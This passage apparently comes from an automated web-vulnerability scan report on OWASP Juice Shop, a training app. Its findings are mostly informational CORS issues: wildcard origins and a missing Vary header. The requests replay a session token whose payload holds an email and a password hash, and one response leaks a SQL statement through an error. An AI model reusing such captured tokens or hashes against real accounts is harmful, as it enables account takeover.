Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://lcjziiknfnqx.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 483
ETag: W/"1e3-mC3tm9U3/CQVlyF/P8fgvQ"
Date: Sun, 15 Jan 2017 21:16:08 GMT
Connection: close

{"status":"success","data":{"id":8,"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connectio
...[SNIP]...
2.13. http://192.168.61.143:3000/api/Users/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Users/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://dppedruidqfy.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

POST /api/Users/ HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 108
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://dppedruidqfy.com

{"email":"mike_landeck@hotmail.com","password":"juice-shop-password","passwordRepeat":"juice-shop-password"}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 289
ETag: W/"121-6s6k4aYh+TR/lQiUc0Ps0Q"
Date: Sun, 15 Jan 2017 21:14:48 GMT
Connection: close

{"status":"error","message":{"errno":19,"code":"SQLITE_CONSTRAINT","sql":"INSERT INTO `Users` (`id`,`email`,`password`,`createdAt`,`updatedAt`) VALUES (NULL,'mike_landeck@hotmail.com','a992b1b403cba28
...[SNIP]...
2.14. http://192.168.61.143:3000/bower_components/angular-animate/angular-animate.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-animate/angular-animate.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://kedavwctmmwc.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-animate/angular-animate.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://kedavwctmmwc.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
ETag: W/"647a-159073e17f8"
Content-Type: application/javascript
Content-Length: 25722
Date: Sun, 15 Jan 2017 21:11:12 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(R,B){'use strict';function Da(a,b,c){if(!a)throw Ma("areq",b||"?",c||"required");return a}function Ea(
...[SNIP]...
2.15. http://192.168.61.143:3000/bower_components/angular-base64/angular-base64.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-base64/angular-base64.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://daapxpgeobvu.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-base64/angular-base64.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://daapxpgeobvu.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 18 May 2015 10:39:05 GMT
ETag: W/"16d4-14d669b0528"
Content-Type: application/javascript
Content-Length: 5844
Date: Sun, 15 Jan 2017 21:11:22 GMT
Connection: close

(function() {
'use strict';

/*
* Encapsulation of Nick Galbreath's base64.js library for AngularJS
* Original notice included below
*/

/*
* Copyright (c) 2010 Nick Ga
...[SNIP]...
2.16. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zhxywfhqbbbq.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zhxywfhqbbbq.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 24 Sep 2016 04:17:49 GMT
ETag: W/"1e014-1575a69d9c8"
Content-Type: application/javascript
Content-Length: 122900
Date: Sun, 15 Jan 2017 21:11:40 GMT
Connection: close

/*
* angular-ui-bootstrap
* http://angular-ui.github.io/bootstrap/

* Version: 2.1.4 - 2016-09-23
* License: MIT
*/angular.module("ui.bootstrap",["ui.bootstrap.tpls","ui.bootstrap.collapse","ui.b
...[SNIP]...
2.17. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-bootstrap/ui-bootstrap.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zjepdssncmll.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-bootstrap/ui-bootstrap.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zjepdssncmll.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 24 Sep 2016 04:17:49 GMT
ETag: W/"189dd-1575a69d9c8"
Content-Type: application/javascript
Content-Length: 100829
Date: Sun, 15 Jan 2017 21:11:39 GMT
Connection: close

/*
* angular-ui-bootstrap
* http://angular-ui.github.io/bootstrap/

* Version: 2.1.4 - 2016-09-23
* License: MIT
*/angular.module("ui.bootstrap",["ui.bootstrap.collapse","ui.bootstrap.tabindex","
...[SNIP]...
2.18. http://192.168.61.143:3000/bower_components/angular-cookies/angular-cookies.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-cookies/angular-cookies.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://oufruiwdpxxt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-cookies/angular-cookies.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://oufruiwdpxxt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
ETag: W/"5a8-159073e17f8"
Content-Type: application/javascript
Content-Length: 1448
Date: Sun, 15 Jan 2017 21:11:34 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(n,c){'use strict';function l(b,a,g){var d=g.baseHref(),k=b[0];return function(b,e,f){var g,h;f=f||{};h
...[SNIP]...
2.19. http://192.168.61.143:3000/bower_components/angular-qrcode/angular-qrcode.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-qrcode/angular-qrcode.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://lfhjeeaqigrl.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-qrcode/angular-qrcode.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://lfhjeeaqigrl.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 02 Apr 2016 10:19:01 GMT
ETag: W/"1493-153d67ba608"
Content-Type: application/javascript
Content-Length: 5267
Date: Sun, 15 Jan 2017 21:11:46 GMT
Connection: close

/*
* angular-qrcode v6.2.1
* (c) 2013 Monospaced http://monospaced.com
* License: MIT
*/

angular.module('monospaced.qrcode', [])
.directive('qrcode', ['$window', function($window) {

var ca
...[SNIP]...
2.20. http://192.168.61.143:3000/bower_components/angular-route/angular-route.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-route/angular-route.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://sovxvfcdthbn.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-route/angular-route.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://sovxvfcdthbn.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:08 GMT
ETag: W/"12b2-159073e1be0"
Content-Type: application/javascript
Content-Length: 4786
Date: Sun, 15 Jan 2017 21:11:54 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(E,d){'use strict';function y(t,l,g){return{restrict:"ECA",terminal:!0,priority:400,transclude:"element
...[SNIP]...
2.21. http://192.168.61.143:3000/bower_components/angular-socket-io/socket.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-socket-io/socket.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://psgsbfcnxgrn.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-socket-io/socket.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://psgsbfcnxgrn.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 08 Dec 2014 04:04:30 GMT
ETag: W/"50b-14a2811e8b0"
Content-Type: application/javascript
Content-Length: 1291
Date: Sun, 15 Jan 2017 21:11:54 GMT
Connection: close

/*
* @license
* angular-socket-io v0.7.0
* (c) 2014 Brian Ford http://briantford.com
* License: MIT
*/
angular.module("btford.socket-io",[]).provider("socketFactory",function(){"use strict";var n
...[SNIP]...
2.22. http://192.168.61.143:3000/bower_components/angular-touch/angular-touch.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-touch/angular-touch.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://elhlyphrfkav.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-touch/angular-touch.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://elhlyphrfkav.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:08 GMT
ETag: W/"fca-159073e1be0"
Content-Type: application/javascript
Content-Length: 4042
Date: Sun, 15 Jan 2017 21:11:59 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(x,n){'use strict';function s(f,k){var e=!1,a=!1;this.ngClickOverrideEnabled=function(b){return n.isDef
...[SNIP]...
2.23. http://192.168.61.143:3000/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://mqemvymanhbp.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://mqemvymanhbp.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 06 Dec 2016 18:57:00 GMT
ETag: W/"55b-158d57f0060"
Content-Type: application/javascript
Content-Length: 1371
Date: Sun, 15 Jan 2017 21:12:07 GMT
Connection: close

/*!
* angular-translate - v2.13.1 - 2016-12-06
*
* Copyright (c) 2016 The angular-translate team, Pascal Precht; Licensed MIT
*/
!function(a,b){"function"==typeof define&&define.amd?define([],fun
...[SNIP]...
2.24. http://192.168.61.143:3000/bower_components/angular-translate/angular-translate.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-translate/angular-translate.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://qecveszgwcyt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-translate/angular-translate.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
